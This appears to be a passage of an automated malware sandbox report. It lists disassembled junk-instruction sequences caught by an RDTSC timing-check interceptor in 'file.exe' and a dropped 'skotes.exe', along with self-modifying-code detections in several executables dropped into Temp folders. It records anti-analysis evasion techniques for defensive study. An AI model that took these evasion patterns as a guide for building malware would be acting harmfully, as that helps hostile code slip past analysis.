                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40A99 second address: 4C40AE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov edi, esi 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 popad 0x00000012 xchg eax, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F0F34BEC155h 0x0000001c and ch, FFFFFFF6h 0x0000001f jmp 00007F0F34BEC151h 0x00000024 popfd 0x00000025 movzx esi, di 0x00000028 popad 0x00000029 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40AE4 second address: 4C40AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40AEA second address: 4C40AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40BB4 second address: 4C40BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dx, ax 0x00000008 popad 0x00000009 pop esi 0x0000000a pushad 0x0000000b mov eax, 442C390Dh 0x00000010 mov edi, esi 0x00000012 popad 0x00000013 pop ebx 0x00000014 pushad 0x00000015 pushad 0x00000016 mov edx, eax 0x00000018 mov cl, 92h 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40BD2 second address: 4C40C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F0F34BEC155h 0x0000000a xor esi, 73F32346h 0x00000010 jmp 00007F0F34BEC151h 0x00000015 popfd 0x00000016 popad 0x00000017 popad 0x00000018 mov esp, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40C0E second address: 4C40C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40C12 second address: 4C40C16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40C16 second address: 4C40C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50B14 second address: 4C50B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50B18 second address: 4C50B2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0111 second address: 4CD0116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0116 second address: 4CD015B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F0F345319F7h 0x0000000a or ax, 86DEh 0x0000000f jmp 00007F0F345319F9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD015B second address: 4CD015F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD015F second address: 4CD0172 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0172 second address: 4CD01F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0F34BEC151h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov al, 05h 0x00000013 pushfd 0x00000014 jmp 00007F0F34BEC159h 0x00000019 xor si, E286h 0x0000001e jmp 00007F0F34BEC151h 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F0F34BEC14Ch 0x0000002e sub ch, 00000028h 0x00000031 jmp 00007F0F34BEC14Bh 0x00000036 popfd 0x00000037 push ecx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC0493 second address: 4CC0497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC0497 second address: 4CC049D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC049D second address: 4CC04BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0F345319F8h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC04BB second address: 4CC04D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F34BEC153h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC04D8 second address: 4CC04FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 mov si, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007F0F345319EDh 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC04FB second address: 4CC050E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC050E second address: 4CC053B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0F345319EDh 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50E07 second address: 4C50E1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0F34BEC151h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50E1E second address: 4C50E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F345319F3h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50E3B second address: 4C50E53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F34BEC154h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50E53 second address: 4C50E89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edx, esi 0x0000000e pushfd 0x0000000f jmp 00007F0F345319F4h 0x00000014 xor esi, 1FFE0638h 0x0000001a jmp 00007F0F345319EBh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC06D9 second address: 4CC06E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC06E7 second address: 4CC06ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC06ED second address: 4CC06F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC06F3 second address: 4CC06F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC06F7 second address: 4CC0747 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movsx edx, si 0x0000000d pushfd 0x0000000e jmp 00007F0F34BEC158h 0x00000013 or ax, 8398h 0x00000018 jmp 00007F0F34BEC14Bh 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F0F34BEC155h 0x00000027 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC0747 second address: 4CC0757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F345319ECh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC0757 second address: 4CC075B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC075B second address: 4CC07B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F0F345319F7h 0x0000000f push dword ptr [ebp+0Ch] 0x00000012 jmp 00007F0F345319F6h 0x00000017 push dword ptr [ebp+08h] 0x0000001a jmp 00007F0F345319F0h 0x0000001f push 11D35709h 0x00000024 pushad 0x00000025 mov dx, A732h 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC07B5 second address: 4CC07DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 xor dword ptr [esp], 11D2570Bh 0x0000000d pushad 0x0000000e call 00007F0F34BEC151h 0x00000013 mov edx, esi 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 mov eax, ebx 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70306 second address: 4C7030C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7030C second address: 4C70310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70310 second address: 4C7033A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F0F345319F9h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7033A second address: 4C7033E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7033E second address: 4C70342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70342 second address: 4C70348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70348 second address: 4C703A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push FFFFFFFEh 0x0000000b pushad 0x0000000c mov edx, eax 0x0000000e mov di, cx 0x00000011 popad 0x00000012 push 1C9B99C9h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov al, F9h 0x0000001c pushfd 0x0000001d jmp 00007F0F345319F3h 0x00000022 add ax, B60Eh 0x00000027 jmp 00007F0F345319F9h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C703A5 second address: 4C7040C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 5A5E264Fh 0x00000010 pushad 0x00000011 movzx esi, di 0x00000014 movsx edx, si 0x00000017 popad 0x00000018 push 4A791C1Bh 0x0000001d pushad 0x0000001e push ebx 0x0000001f mov dx, cx 0x00000022 pop ecx 0x00000023 mov bx, 7BDAh 0x00000027 popad 0x00000028 xor dword ptr [esp], 3C89B21Bh 0x0000002f jmp 00007F0F34BEC151h 0x00000034 mov eax, dword ptr fs:[00000000h] 0x0000003a jmp 00007F0F34BEC14Eh 0x0000003f nop 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7040C second address: 4C70410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70410 second address: 4C70416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70416 second address: 4C70425 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F345319EBh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70425 second address: 4C70470 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F0F34BEC152h 0x00000010 sbb ah, FFFFFFD8h 0x00000013 jmp 00007F0F34BEC14Bh 0x00000018 popfd 0x00000019 jmp 00007F0F34BEC158h 0x0000001e popad 0x0000001f nop 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70470 second address: 4C70474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70474 second address: 4C704F6 instructions: 0x00000000 rdtsc 0x00000002 mov bx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F0F34BEC156h 0x0000000d sbb ecx, 49A2C398h 0x00000013 jmp 00007F0F34BEC14Bh 0x00000018 popfd 0x00000019 popad 0x0000001a sub esp, 1Ch 0x0000001d pushad 0x0000001e movzx ecx, dx 0x00000021 mov cx, di 0x00000024 popad 0x00000025 push esp 0x00000026 jmp 00007F0F34BEC158h 0x0000002b mov dword ptr [esp], ebx 0x0000002e jmp 00007F0F34BEC150h 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F0F34BEC157h 0x0000003b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C704F6 second address: 4C70515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 jmp 00007F0F345319EBh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movzx esi, dx 0x00000015 movsx edx, cx 0x00000018 popad 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70515 second address: 4C7051B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7051B second address: 4C70544 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0F345319F5h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70685 second address: 4C70737 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F0F34BEC157h 0x00000011 xor ah, FFFFFF9Eh 0x00000014 jmp 00007F0F34BEC159h 0x00000019 popfd 0x0000001a pushad 0x0000001b mov eax, 273B2DBDh 0x00000020 pushfd 0x00000021 jmp 00007F0F34BEC14Ah 0x00000026 and si, E998h 0x0000002b jmp 00007F0F34BEC14Bh 0x00000030 popfd 0x00000031 popad 0x00000032 popad 0x00000033 nop 0x00000034 pushad 0x00000035 call 00007F0F34BEC154h 0x0000003a pop edx 0x0000003b jmp 00007F0F34BEC14Eh 0x00000040 popad 0x00000041 lea eax, dword ptr [ebp-10h] 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F0F34BEC157h 0x0000004b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70737 second address: 4C7073D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7073D second address: 4C70757 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr fs:[00000000h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0F34BEC14Ah 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70757 second address: 4C70769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F345319EEh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70769 second address: 4C70783 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70783 second address: 4C70787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70787 second address: 4C7078D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7078D second address: 4C707CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edi, cx 0x00000012 pushfd 0x00000013 jmp 00007F0F345319F6h 0x00000018 adc si, 54A8h 0x0000001d jmp 00007F0F345319EBh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C707CD second address: 4C7086F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 mov eax, ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d jmp 00007F0F34BEC14Dh 0x00000012 jne 00007F0FA6E3B683h 0x00000018 jmp 00007F0F34BEC14Eh 0x0000001d sub eax, eax 0x0000001f pushad 0x00000020 mov di, CD02h 0x00000024 jmp 00007F0F34BEC153h 0x00000029 popad 0x0000002a mov dword ptr [ebp-20h], eax 0x0000002d pushad 0x0000002e pushad 0x0000002f movzx esi, bx 0x00000032 pushfd 0x00000033 jmp 00007F0F34BEC153h 0x00000038 add eax, 63B1E55Eh 0x0000003e jmp 00007F0F34BEC159h 0x00000043 popfd 0x00000044 popad 0x00000045 popad 0x00000046 mov ebx, dword ptr [esi] 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b jmp 00007F0F34BEC153h 0x00000050 mov ch, 76h 0x00000052 popad 0x00000053 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7086F second address: 4C708B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-24h], ebx 0x0000000c pushad 0x0000000d mov edi, ecx 0x0000000f call 00007F0F345319EAh 0x00000014 mov ah, 2Dh 0x00000016 pop edi 0x00000017 popad 0x00000018 test ebx, ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0F345319F9h 0x00000021 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C708B6 second address: 4C708BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C708BC second address: 4C708C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60E17 second address: 4C60E60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F0F34BEC150h 0x0000000e mov cx, 26A1h 0x00000012 pop ecx 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0F34BEC153h 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60E60 second address: 4C60EBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0F345319EFh 0x00000009 add eax, 31CB37FEh 0x0000000f jmp 00007F0F345319F9h 0x00000014 popfd 0x00000015 mov esi, 2513D447h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f jmp 00007F0F345319F8h 0x00000024 pushad 0x00000025 mov eax, 51810227h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: B0F8C1 second address: B0F8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: B0F8C6 second address: B0F8CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: C78A44 second address: C78A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F0F34BEC159h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: C896DF second address: C89701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0F345319E6h 0x0000000a pop ebx 0x0000000b pop esi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0F345319F1h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BEF6B5 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C7C8EF instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: CAF6B5 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: D3C8EF instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSpecial instruction interceptor: First address: 4A3277 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSpecial instruction interceptor: First address: 2F608E instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSpecial instruction interceptor: First address: 4B442E instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSpecial instruction interceptor: First address: 53184C instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSpecial instruction interceptor: First address: 8CFC3D instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSpecial instruction interceptor: First address: 8CFB5B instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSpecial instruction interceptor: First address: B027A4 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeSpecial instruction interceptor: First address: 67DE86 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeSpecial instruction interceptor: First address: 67DDE9 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeSpecial instruction interceptor: First address: 831E84 instructions caused by: Self-modifying code
